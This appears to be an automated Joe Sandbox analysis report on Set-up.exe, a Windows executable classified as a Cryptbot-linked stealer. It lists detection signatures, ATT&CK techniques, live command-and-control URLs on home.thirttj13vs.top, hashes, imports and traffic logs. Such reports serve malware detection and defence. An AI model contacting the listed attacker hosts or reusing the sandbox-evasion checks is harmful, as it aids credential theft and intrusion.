    Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Set-up.exe, Set-up.exe, 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
    Source: Set-up.exe, Set-up.exe, 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 4764, type: MEMORYSTR
    Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
    Source: global trafficTCP traffic: 192.168.2.5:49706 -> 34.147.147.173:80

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 4764, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CBA550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,0_2_00CBA550
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D4AA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,0_2_00D4AA30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CCE480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,0_2_00CCE480
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Virtualization/Sandbox Evasion
    OS Credential Dumping1
    System Time Discovery
    Remote Services11
    Archive Collected Data
    21
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Deobfuscate/Decode Files or Information
    LSASS Memory231
    Security Software Discovery
    Remote Desktop Protocol1
    Data from Local System
    4
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
    Obfuscated Files or Information
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Install Root Certificate
    NTDS12
    Process Discovery
    Distributed Component Object ModelInput Capture15
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    Remote System Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync17
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221fd4100%Avira URL Cloudmalware
    thirttj13vsj13vs.top0%Avira URL Cloudsafe
    http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221http://home.thirttj13vs.top/jhkNTMUXVuSQJm100%Avira URL Cloudmalware
    http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221?argument=0100%Avira URL Cloudmalware
    home.thirttj13vs.top100%Avira URL Cloudmalware
    indohome.thirttj13vs.top100%Avira URL Cloudmalware
    http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221100%Avira URL Cloudmalware
    homettj13vsj13vs.top0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    home.thirttj13vs.top
    34.147.147.173
    truefalse
      high
      httpbin.org
      50.19.58.113
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        indohome.thirttj13vs.toptrue
        • Avira URL Cloud: malware
        unknown
        http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221?argument=0true
        • Avira URL Cloud: malware
        unknown
        http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221true
        • Avira URL Cloud: malware
        unknown
        thirttj13vsj13vs.toptrue
        • Avira URL Cloud: safe
        unknown
        homettj13vsj13vs.toptrue
        • Avira URL Cloud: safe
        unknown
        home.thirttj13vs.toptrue
        • Avira URL Cloud: malware
        unknown
        https://httpbin.org/ipfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlSet-up.exefalse
            high
            http://html4/loose.dtdSet-up.exefalse
              high
              https://curl.se/docs/alt-svc.html#Set-up.exefalse
                high
                https://httpbin.org/ipbeforeSet-up.exefalse
                  high
                  https://curl.se/docs/http-cookies.htmlSet-up.exefalse
                    high
                    https://curl.se/docs/hsts.html#Set-up.exefalse
                      high
                      http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221http://home.thirttj13vs.top/jhkNTMUXVuSQJmSet-up.exe, 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221fd4Set-up.exe, 00000000.00000002.2253280536.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251976781.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252171171.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252153907.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251997102.0000000000C0B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://curl.se/docs/http-cookies.html#Set-up.exefalse
                        high
                        https://curl.se/docs/alt-svc.htmlSet-up.exefalse
                          high
                          http://.cssSet-up.exefalse
                            high
                            http://.jpgSet-up.exefalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              34.147.147.173
                              home.thirttj13vs.topUnited States
                              2686ATGS-MMD-ASUSfalse
                              50.19.58.113
                              httpbin.orgUnited States
                              14618AMAZON-AESUSfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1585344
                              Start date and time:2025-01-07 14:37:09 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 29s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:4
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Set-up.exe
                              Detection:MAL
                              Classification:mal88.troj.spyw.evad.winEXE@1/0@9/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 77%
                              • Number of executed functions: 44
                              • Number of non-executed functions: 144
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: Set-up.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              34.147.147.173Set-up.exeGet hashmaliciousCryptbotBrowse
                              • home.thirttj13vs.top/gbVspuhpvozlydclqfRi1736138767
                              Set-up.exeGet hashmaliciousCryptbotBrowse
                              • home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467
                              ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                              random(5).exeGet hashmaliciousCryptbotBrowse
                              • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
                              Set-up.exeGet hashmaliciousUnknownBrowse
                              • home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
                              TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                              • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                              XJiB3BdLTg.exeGet hashmaliciousUnknownBrowse
                              • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                              Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                              • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                              50.19.58.113Set-up.exeGet hashmaliciousCryptbotBrowse
                                Set-up.exeGet hashmaliciousCryptbotBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  httpbin.orgSet-up.exeGet hashmaliciousCryptbotBrowse
                                  • 50.19.58.113
                                  Set-up.exeGet hashmaliciousCryptbotBrowse
                                  • 50.19.58.113
                                  ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                  • 34.197.122.172
                                  random(3).exeGet hashmaliciousCryptbotBrowse
                                  • 34.200.57.114
                                  random(5).exeGet hashmaliciousCryptbotBrowse
                                  • 34.200.57.114
                                  Set-up.exeGet hashmaliciousUnknownBrowse
                                  • 34.200.57.114
                                  Set-up.exeGet hashmaliciousUnknownBrowse
                                  • 34.200.57.114
                                  TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                  • 34.200.57.114
                                  Prs9eAnu2k.exeGet hashmaliciousUnknownBrowse
                                  • 34.197.122.172
                                  joE9s9sbv0.exeGet hashmaliciousUnknownBrowse
                                  • 34.200.57.114
                                  home.thirttj13vs.topSet-up.exeGet hashmaliciousCryptbotBrowse
                                  • 34.147.147.173
                                  Set-up.exeGet hashmaliciousCryptbotBrowse
                                  • 34.147.147.173
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  AMAZON-AESUSmiori.mpsl.elfGet hashmaliciousUnknownBrowse
                                  • 34.237.171.139
                                  miori.m68k.elfGet hashmaliciousUnknownBrowse
                                  • 18.234.211.28
                                  https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                  • 3.5.69.65
                                  Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                  • 3.230.91.101
                                  Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                  • 3.5.0.85
                                  http://zpr.io/Kv3PL3bahS66#/yl4Wu36827Bu431QZ961hL12343hL3105bG14HH36065Ve26730Ek67523jA69203Zh08983yN1415487657=Get hashmaliciousUnknownBrowse
                                  • 34.239.90.156
                                  https://d3sdeiz39xdvhy.cloudfront.netGet hashmaliciousUnknownBrowse
                                  • 3.5.28.69
                                  Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                  • 3.211.160.164
                                  Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                  • 52.206.40.253
                                  miori.x86.elfGet hashmaliciousUnknownBrowse
                                  • 3.93.170.239
                                  ATGS-MMD-ASUSmiori.arm5.elfGet hashmaliciousUnknownBrowse
                                  • 56.181.99.78
                                  miori.spc.elfGet hashmaliciousUnknownBrowse
                                  • 34.161.163.146
                                  miori.mpsl.elfGet hashmaliciousUnknownBrowse
                                  • 32.159.254.120
                                  miori.mips.elfGet hashmaliciousUnknownBrowse
                                  • 56.193.95.60
                                  miori.m68k.elfGet hashmaliciousUnknownBrowse
                                  • 33.147.120.229
                                  miori.arm.elfGet hashmaliciousUnknownBrowse
                                  • 57.152.43.223
                                  miori.sh4.elfGet hashmaliciousUnknownBrowse
                                  • 56.26.234.229
                                  miori.ppc.elfGet hashmaliciousUnknownBrowse
                                  • 33.147.219.140
                                  file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                  • 34.54.88.138
                                  Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                  • 34.1.227.231
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                  Entropy (8bit):6.2389850647833285
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.53%
                                  • InstallShield setup (43055/19) 0.43%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:Set-up.exe
                                  File size:7'343'240 bytes
                                  MD5:e52da29ca9214e322ba939105a9d6bb8
                                  SHA1:d68b8830eb9422ec86519d79489b74b961b8ede9
                                  SHA256:cdfd0e6a74e3e02b6cd8bdb70f68502354c876bcce3c897fa110ba93a3ce157a
                                  SHA512:485673203bf397ce90ee839f0a5b299ca8b36650679ddad10898dbea9727ecac09fad837fac900f343e70e52057839d317ca182898f3bc728aae1efb4484101f
                                  SSDEEP:98304:M20fKv7YQHm2cEcbKRBeMVf+I6SK3yz8Q:ayUQG2sKHe/SwG8Q
                                  TLSH:68762A65EE8785F5D68305725056B73F6E30AF009835CEB6CE90FB34D672A11E98E328
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{g...............(..M...p..2............M...@...........................p.....2\p...@... ............................
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x4014a0
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x677BC18D [Mon Jan 6 11:42:05 2025 UTC]
                                  TLS Callbacks:0x7890e0, 0x789090
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:51b39aff649af7abc30a06f2362db069
                                  Signature Valid:false
                                  Signature Issuer:CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
                                  Signature Validation Error:A certificate chain could not be built to a trusted root authority
                                  Error Number:-2146762486
                                  Not Before, Not After
                                  • 26/08/2024 18:01:06 21/08/2025 18:01:06
                                  Subject Chain
                                  • CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
                                  Version:3
                                  Thumbprint MD5:4F692AD7D5E9F7541C05264FF2520114
                                  Thumbprint SHA-1:21083D0EDD4084816CAEA285AC1B723E6FCC743D
                                  Thumbprint SHA-256:32F5B9B1551F53C237D964D7810B2EA70F7101DACC20AF78D0632A1B3BBED61B
                                  Serial:33009F7B734DB0480411EB0BBA0000009F7B73
                                  Instruction
                                  mov dword ptr [00ACD658h], 00000001h
                                  jmp 00007F4361087796h
                                  nop
                                  mov dword ptr [00ACD658h], 00000000h
                                  jmp 00007F4361087786h
                                  nop
                                  sub esp, 1Ch
                                  mov eax, dword ptr [esp+20h]
                                  mov dword ptr [esp], eax
                                  call 00007F436140EFF6h
                                  cmp eax, 01h
                                  sbb eax, eax
                                  add esp, 1Ch
                                  ret
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  nop
                                  push ebp
                                  mov ebp, esp
                                  push edi
                                  push esi
                                  push ebx
                                  sub esp, 1Ch
                                  mov dword ptr [esp], 00973000h
                                  call dword ptr [00ACF9A8h]
                                  sub esp, 04h
                                  test eax, eax
                                  je 00007F4361087B55h
                                  mov ebx, eax
                                  mov dword ptr [esp], 00973000h
                                  call dword ptr [00ACFA1Ch]
                                  mov edi, dword ptr [00ACF9BCh]
                                  sub esp, 04h
                                  mov dword ptr [00ACB028h], eax
                                  mov dword ptr [esp+04h], 00973013h
                                  mov dword ptr [esp], ebx
                                  call edi
                                  sub esp, 08h
                                  mov esi, eax
                                  mov dword ptr [esp+04h], 00973029h
                                  mov dword ptr [esp], ebx
                                  call edi
                                  sub esp, 08h
                                  mov dword ptr [008DF004h], eax
                                  test esi, esi
                                  je 00007F4361087AF3h
                                  mov dword ptr [esp+04h], 00ACB02Ch
                                  mov dword ptr [esp], 00AC6104h
                                  call esi
                                  mov dword ptr [esp], 00401580h
                                  call 00007F4361087A43h
                                  lea esp, dword ptr [ebp-0Ch]
                                  pop ebx
                                  pop esi
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6cf0000x2dac.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x7006000x688.reloc
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x6d40000x34cac.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x6bb3200x18.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x6cf8140x620.idata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x4dd7dc0x4dd80078b38f7fc4512396670ca8047ec26268unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .data0x4df0000x938440x93a00591873babcb047cd7a92aba5b1e02b68False0.03943460256138866dBase III DBT, version number 0, next free block index 100.5495822228695116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rdata0x5730000x1521580x15220015c30fe6924a9e38af9d630b0d79e379False0.4208229840573013data6.276992533378594IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .eh_fram0x6c60000x4d640x4e009b5abfcb69713e2809be5fd0aff2f900False0.3196614583333333data4.912121609306582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .bss0x6cb0000x31800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata0x6cf0000x2dac0x2e0026a5aafaa2e4e68426394b48fecda243False0.36922554347826086data5.484899309984402IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .CRT0x6d20000x300x200fe2a65d4187b984679c52ae93485940eFalse0.0625data0.2233456448570176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .tls0x6d30000x80x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .reloc0x6d40000x34cac0x34e00be566086ba0e62562421bb437f75b698False0.4982638888888889data6.658158135041687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  DLLImport
                                  ADVAPI32.dllCryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
                                  bcrypt.dllBCryptGenRandom
                                  CRYPT32.dllCertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
                                  GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
                                  gdiplus.dllGdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
                                  IPHLPAPI.DLLConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
                                  KERNEL32.dllAcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
                                  msvcrt.dll__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
                                  ole32.dllCreateStreamOnHGlobal
                                  SHELL32.dllSHGetKnownFolderPath
                                  api-ms-win-crt-convert-l1-1-0.dllatoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
                                  api-ms-win-crt-environment-l1-1-0.dll__p__environ, __p__wenviron, getenv
                                  api-ms-win-crt-filesystem-l1-1-0.dll_fstat64, _stat64, _unlink
                                  api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, calloc, free, malloc, realloc
                                  api-ms-win-crt-locale-l1-1-0.dllsetlocale
                                  api-ms-win-crt-math-l1-1-0.dll_fdopen
                                  api-ms-win-crt-private-l1-1-0.dllmemchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
                                  api-ms-win-crt-runtime-l1-1-0.dll_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
                                  api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
                                  api-ms-win-crt-string-l1-1-0.dll_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
                                  api-ms-win-crt-time-l1-1-0.dll__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
                                  api-ms-win-crt-utility-l1-1-0.dll_byteswap_uint64, bsearch, qsort, rand, srand
                                  USER32.dllCharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
                                  WS2_32.dllWSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 7, 2025 14:38:00.986845016 CET49704443192.168.2.550.19.58.113
                                  Jan 7, 2025 14:38:00.986862898 CET4434970450.19.58.113192.168.2.5
                                  Jan 7, 2025 14:38:00.986918926 CET49704443192.168.2.550.19.58.113
                                  Jan 7, 2025 14:38:00.989222050 CET49704443192.168.2.550.19.58.113
                                  Jan 7, 2025 14:38:00.989233971 CET4434970450.19.58.113192.168.2.5
                                  Jan 7, 2025 14:38:01.671528101 CET4434970450.19.58.113192.168.2.5
                                  Jan 7, 2025 14:38:01.672029972 CET49704443192.168.2.550.19.58.113
                                  Jan 7, 2025 14:38:01.672055960 CET4434970450.19.58.113192.168.2.5
                                  Jan 7, 2025 14:38:01.673432112 CET4434970450.19.58.113192.168.2.5
